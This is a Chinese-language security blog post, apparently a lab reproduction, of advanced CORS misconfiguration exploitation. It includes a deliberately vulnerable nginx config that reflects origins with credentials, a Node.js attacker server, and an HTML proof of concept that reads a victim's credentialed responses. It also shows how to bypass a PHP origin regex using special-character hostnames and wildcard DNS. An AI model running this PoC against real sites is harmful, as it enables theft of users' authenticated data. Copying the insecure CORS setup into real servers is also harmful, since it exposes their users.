<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">











<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="简介差不多有半年没写这些总结文章了，从现在开始恢复写。前些日子拜读了Corben Leo的Advanced CORS Exploitation Techniques，收获良多，想着有空复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。  CORS stands for Cross-Origin Resource Sharing. Is an featu">
<meta name="keywords" content="CORS">
<meta property="og:type" content="article">
<meta property="og:title" content="cors的进阶利用">
<meta property="og:url" content="http://blog.x1001.cn/2019/07/17/cors的进阶利用/index.html">
<meta property="og:site_name" content="x1001">
<meta property="og:description" content="简介差不多有半年没写这些总结文章了，从现在开始恢复写。前些日子拜读了Corben Leo的Advanced CORS Exploitation Techniques，收获良多，想着有空复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。  CORS stands for Cross-Origin Resource Sharing. Is an featu">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://blog.x1001.cn/img/cors.jpg">
<meta property="og:image" content="http://blog.x1001.cn/img/corsproof.jpg">
<meta property="og:image" content="http://blog.x1001.cn/img/cors2.png">
<meta property="og:image" content="http://blog.x1001.cn/img/domainparse.jpg">
<meta property="og:image" content="http://blog.x1001.cn/img/cors3.png">
<meta property="og:image" content="http://blog.x1001.cn/img/cors4.jpg">
<meta property="og:updated_time" content="2019-07-17T15:00:37.371Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="cors的进阶利用">
<meta name="twitter:description" content="简介差不多有半年没写这些总结文章了，从现在开始恢复写。前些日子拜读了Corben Leo的Advanced CORS Exploitation Techniques，收获良多，想着有空复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。  CORS stands for Cross-Origin Resource Sharing. Is an featu">
<meta name="twitter:image" content="http://blog.x1001.cn/img/cors.jpg">






  <link rel="canonical" href="http://blog.x1001.cn/2019/07/17/cors的进阶利用/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>cors的进阶利用 | x1001</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">x1001</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://blog.x1001.cn/2019/07/17/cors的进阶利用/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="x1001">
      <meta itemprop="description" content="freedom and open world">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="x1001">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">cors的进阶利用

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-07-17 22:02:21 / Modified: 23:00:37" itemprop="dateCreated datePublished" datetime="2019-07-17T22:02:21+08:00">2019-07-17</time>
            

            
              

              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>差不多有半年没写这些总结文章了，从现在开始恢复写。前些日子拜读了Corben Leo的<span class="exturl" data-url="aHR0cHM6Ly93d3cuY29yYmVuLmlvL2FkdmFuY2VkLWNvcnMtdGVjaG5pcXVlcy8=" title="https://www.corben.io/advanced-cors-techniques/">Advanced CORS Exploitation Techniques<i class="fa fa-external-link"></i></span>，收获良多，想着有空复现一下cors漏洞的进阶利用。直入正题。</p>
<h1 id="CORS介绍"><a href="#CORS介绍" class="headerlink" title="CORS介绍"></a>CORS介绍</h1><p>这里就借<span class="exturl" data-url="aHR0cHM6Ly93d3cub3dhc3Aub3JnL2luZGV4LnBocC9DT1JTX1JlcXVlc3RQcmVmbGlnaFNjcnV0aW55" title="https://www.owasp.org/index.php/CORS_RequestPreflighScrutiny">OWASP<i class="fa fa-external-link"></i></span>的关于CORS的介绍。</p>
<blockquote>
<p><strong>CORS</strong> stands for <strong>C</strong>ross-<strong>O</strong>rigin <strong>R</strong>esource <strong>S</strong>haring.</p>
<p>Is an feature offering the possbility to:</p>
<ul>
<li>A web application to expose resources to all or restricted domain,</li>
<li>A web client to made AJAX request for resource on other domain than is source domain.</li>
</ul>
<p>This article will focus on HTTP <strong>Request Preflight</strong> feature proposed by CORS W3C specification and (mainly) how to setup a protection, on web application side, against CORS HTTP request that try to bypass the preflight process.</p>
</blockquote>
<p>简单的来说，它是为了跨域资源共享，web开发者可以通过发送AJAX请求不同域下的资源。关于CORS的利用可以参考这篇文章<span class="exturl" data-url="aHR0cHM6Ly94ei5hbGl5dW4uY29tL3QvMjc0NQ==" title="https://xz.aliyun.com/t/2745">《cors安全完全指南》<i class="fa fa-external-link"></i></span>。</p>
<h1 id="复现环境准备"><a href="#复现环境准备" class="headerlink" title="复现环境准备"></a>复现环境准备</h1><ul>
<li>靶机环境<ul>
<li>nginx/1.16.0</li>
<li>PHP 5.6.40</li>
</ul>
</li>
<li>攻击机环境<ul>
<li>Node/v10.9.0</li>
</ul>
</li>
</ul>
<h1 id="靶机环境配置"><a href="#靶机环境配置" class="headerlink" title="靶机环境配置"></a>靶机环境配置</h1><p>为靶机配置CORS策略，在nginx.conf server下增加以下配置：</p>
<p><code>location / {</code></p>
<p>​        <code>add_header Access-Control-Allow-Origin $http_origin;</code></p>
<p>​        <code>add_header Access-Control-Allow-Methods GET,POST,OPTIONS;</code></p>
<p>​        <code>add_header Access-Control-Allow-Credentials true;</code></p>
<p>   <code>if ($request_method = OPTIONS) {</code></p>
<p>​        <code>add_header Access-Control-Allow-Origin $http_origin;</code></p>
<p>​        <code>add_header Access-Control-Allow-Methods GET,POST,OPTIONS;</code></p>
<p>​        <code>add_header Access-Control-Allow-Credentials true;</code></p>
<p>​        <code>add_header Access-Control-Allow-Headers DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type;</code></p>
<p>​        <code>add_header Access-Control-Max-Age 1728000;</code></p>
<p>​        <code>return 204;</code></p>
<p>   <code>}</code></p>
<p><code>}</code></p>
<h1 id="初步利用"><a href="#初步利用" class="headerlink" title="初步利用"></a>初步利用</h1><p>初步测试，增加Origin头。发现返回包中出现<strong>Access-Control-Allow-Origin:[输入的origin]</strong>和<strong>Access-Control-Allow-Credentials: true</strong></p>
<p><img src="/img/cors.jpg" alt=""></p>
<p>攻击者服务器端代码：</p>
<p><em>Server.js</em></p>
<p><code>var http = require(&#39;http&#39;);</code><br><code>var url  = require(&#39;url&#39;);</code><br><code>var fs   = require(&#39;fs&#39;);</code><br><code>var port = 9999</code></p>
<p><code>http.createServer(function(req, res) {</code><br>    <code>if (req.url == &#39;/cors-poc&#39;) {</code><br>        <code>fs.readFile(&#39;cors.html&#39;, function(err, data) {</code><br>            <code>res.writeHead(200, {&#39;Content-Type&#39;:&#39;text/html&#39;});</code><br>            <code>res.write(data);</code><br>            <code>res.end();</code><br>        <code>});</code><br>    <code>} else {</code><br>        <code>res.writeHead(200, {&#39;Content-Type&#39;:&#39;text/html&#39;});</code><br>        <code>res.write(&#39;never gonna give you up...&#39;);</code><br>        <code>res.end();</code><br>    <code>}</code><br><code>}).listen(port, &#39;0.0.0.0&#39;);</code><br><code>console.log(Serving on port ${port});</code></p>
<p><em>Cors.html</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">title</span>&gt;</span>CORS<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">function cors() &#123;</span></span><br><span class="line"><span class="undefined">  var xhttp = new XMLHttpRequest();</span></span><br><span class="line"><span class="undefined">  xhttp.onreadystatechange = function() &#123;</span></span><br><span class="line"><span class="undefined">    if (this.readyState == 4 &amp;&amp; this.status == 200) &#123;</span></span><br><span class="line"><span class="undefined">      document.getElementById("pwnz").innerHTML = this.responseText;</span></span><br><span class="line"><span class="undefined">    &#125;</span></span><br><span class="line"><span class="undefined">  &#125;;</span></span><br><span class="line"><span class="undefined">  xhttp.open("GET", "http://www.x1001.cn/cors.php", true);</span></span><br><span class="line"><span class="undefined">  xhttp.withCredentials = true;</span></span><br><span class="line"><span class="undefined">  xhttp.send();</span></span><br><span class="line"><span class="undefined">&#125;</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> </span><br><span class="line"> <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">"cors();"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">center</span>&gt;</span></span><br><span class="line">cors proof-of-concept:<span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">textarea</span> <span class="attr">rows</span>=<span class="string">"10"</span> <span class="attr">cols</span>=<span class="string">"60"</span> <span class="attr">id</span>=<span class="string">"pwnz"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">textarea</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>浏览器访问<span class="exturl" data-url="aHR0cDovL2xvY2FsaG9zdDo5OTk5L2NvcnMtcG9j44CC56qD5Y+WeDEwMDEuY27kuK3nlKjmiLfkv6Hmga/jgII=" title="http://localhost:9999/cors-poc。窃取x1001.cn中用户信息。">http://localhost:9999/cors-poc。窃取x1001.cn中用户信息。<i class="fa fa-external-link"></i></span></p>
<p><img src="/img/corsproof.jpg" alt=""></p>
<p>开发者代码示例：</p>
<p><code>&lt;?php</code></p>
<p><code>http_origin = &#39;&#39;;</code></p>
<p><code>if (!empty($_SERVER[&#39;HTTP_ORIGIN&#39;]) &amp;&amp; preg_match(&#39;/^https?:\/\/(.*\.)?x1001.cn([^\.\-a-zA-Z0-9]+.*)?/i&#39;,$_SERVER[&#39;HTTP_ORIGIN&#39;],$matchers)) {</code></p>
<p><code>$http_origin$= $matchers[0];</code></p>
<p>​    <code>header(&quot;Access-Control-Allow-Origin: {$http_origin}&quot;);</code></p>
<p>​    <code>header(&quot;Access-Control-Allow-Methods&quot;, &quot;POST,GET&quot;);</code></p>
<p>​    <code>header(&#39;Access-Control-Allow-Credentials:true&#39;);</code></p>
<p>​    <code>header(&#39;Access-Control-Allow-Headers : X-Requested-With&#39;);</code></p>
<p><code>}</code></p>
<p>这种是存在于开发者允许任意源的情况，若开发者对输入的Origin做个正则匹配，如以下情况该怎么触发漏洞？</p>
<p><code>setcookie(&#39;user&#39;,&#39;value&#39;);</code></p>
<p><code>if (isset($_COOKIE[&quot;user&quot;])){</code></p>
<p>​        <code>header(&#39;Content-Type:text/json;charset=utf-8&#39;);</code></p>
<p>​        <code>$str = array</code></p>
<p>​        <code>(</code></p>
<p>​        <code>&#39;Name&#39;=&gt;&#39;x1001&#39;,</code></p>
<p>​        <code>&#39;Age&#39;=&gt;0</code></p>
<p>​        <code>);</code></p>
<p>​        <code>$jsonencode = json_encode($str);</code></p>
<p>​        <code>echo $jsonencode;</code></p>
<p><code>}</code></p>
<p><code>else{</code></p>
<p><code>echo &quot;404&quot;;</code></p>
<p><code>}</code></p>
<p><code>?&gt;</code></p>
<p>可以看到开发者在设置Access-Control-Allow-Origin头时对Origin进行了正则匹配。下面是正则匹配的详细说明：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[^\.\-a-zA-Z0-9] 不匹配&quot;.&quot; &quot;-&quot; &quot;a-z&quot; &quot;A-Z&quot; &quot;0-9&quot; 这些字符</span><br><span class="line">+ 匹配前一个表达式一到n次</span><br><span class="line">.* 匹配任意字符除去行终止符</span><br></pre></td></tr></table></figure>
<p>这里有两种方式：</p>
<ol>
<li>借助该域名或子域名（若正则允许子域名）下的xss漏洞触发CORS漏洞</li>
<li>通过特殊字符突破正则表达式。</li>
</ol>
<h1 id="高阶利用原理"><a href="#高阶利用原理" class="headerlink" title="高阶利用原理"></a>高阶利用原理</h1><p>在那篇文章中已经很详细的说明了这种方式利用的原理，这里在简要说明一下。</p>
<p>我们已经知道开发者设置了正则表达式去校验Origin，首先想到是绕过这个正则表达式，上述表达式并没有限制特殊字符，比如!@#$%等等。我们可以通过构造类似如<strong>x10001.cn_.\<your-domain>/cors-poc</your-domain></strong>来绕过正则表达式。这将是一个突破口，接下来我们需要了解浏览器请求进行域名解析到获取到内容的过程，这就决定我们是否能通过这种形式获取受害者的数据。</p>
<p><img src="/img/cors2.png" alt="image-20190717140008854"></p>
<ul>
<li><p>首先了解浏览器请求域名显示内容的过程</p>
<ol>
<li>用户通过浏览器访问URL</li>
<li>进行DNS查询将HOST转化成ip地址</li>
<li>向服务器发送SYN请求连接</li>
<li>服务器返回SYN+ACK</li>
<li>浏览器发送HTTP请求获取HTML解析</li>
</ol>
</li>
<li><p>其次域名支持泛解析。所谓的泛解析是指：利用通配符*（星号）来做次级域名以实现所有的次级域名均指向同一IP地址。如图：</p>
<p><img src="/img/domainparse.jpg" alt="域名的泛解析"></p>
</li>
<li><p>最后一点，浏览器要能够处理这些畸形的请求。不同的浏览器对不同的特殊字符有不同的响应的。基于那篇文章整理出一些主流的浏览器能够处理请求的特殊字符。</p>
<ul>
<li>Chrom&amp;Firefox      <strong>x1001.cn_.\<your domain="">/cors-poc</your></strong></li>
</ul>
<p><img src="/img/cors3.png" alt="image-20190717141619700"></p>
<ul>
<li>Safari          <strong>x1001.cn-_.<your domain\="">/cors-poc</your></strong></li>
</ul>
</li>
</ul>
<p><img src="/img/cors4.jpg" alt=""></p>
<h1 id="Let’s-Hack"><a href="#Let’s-Hack" class="headerlink" title="Let’s Hack"></a>Let’s Hack</h1><ul>
<li>需要一个域名，设置泛解析记录</li>
<li>NodeJS</li>
</ul>
<ol>
<li>首先设置攻击者域名泛解析</li>
<li>攻击者服务器部署cors payload（如上面代码）</li>
<li>浏览器访问 x1001.cn-_.<your domain\="">/cors-poc，攻击成功。</your></li>
</ol>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CORS/" rel="tag"># CORS</a>
          
        </div>
      

      
      
      

      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80MjE3NS8xODcyMg=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">x1001</p>
              <p class="site-description motion-element" itemprop="description">freedom and open world</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">1</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                    <span class="site-state-item-count">1</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3ppaXpodXd5" title="GitHub &rarr; https://github.com/ziizhuwy"><i class="fa fa-fw fa-github"></i>GitHub</span>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <span class="exturl" data-url="bWFpbHRvOnppaXpodXd5QGdtYWlsLmNvbQ==" title="E-Mail &rarr; mailto:ziizhuwy@gmail.com"><i class="fa fa-fw fa-envelope"></i>E-Mail</span>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CORS介绍"><span class="nav-number">2.</span> <span class="nav-text">CORS介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#复现环境准备"><span class="nav-number">3.</span> <span class="nav-text">复现环境准备</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#靶机环境配置"><span class="nav-number">4.</span> <span class="nav-text">靶机环境配置</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#初步利用"><span class="nav-number">5.</span> <span class="nav-text">初步利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#高阶利用原理"><span class="nav-number">6.</span> <span class="nav-text">高阶利用原理</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Let’s-Hack"><span class="nav-number">7.</span> <span class="nav-text">Let’s Hack</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">  <span class="exturl" data-url="aHR0cDovL3d3dy5taWl0YmVpYW4uZ292LmNu">浙ICP备17017969号 </span>&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">x1001</span>

  

  
</div>


  <div class="powered-by">Powered by <span class="exturl theme-link" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <span class="exturl theme-link" data-url="aHR0cHM6Ly90aGVtZS1uZXh0Lm9yZw==">NexT.Mist</span> v6.7.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  


  <script src="/js/src/schemes/muse.js?v=6.7.0"></script>




  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  


  
    <script>
  window.livereOptions = {
    refer: '2019/07/17/cors的进阶利用/'
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
</script>

  


  





  

  

  

  

  

  

  

  

  

  
  <script src="/js/src/exturl.js?v=6.7.0"></script>


  

  

  

</body>
</html>
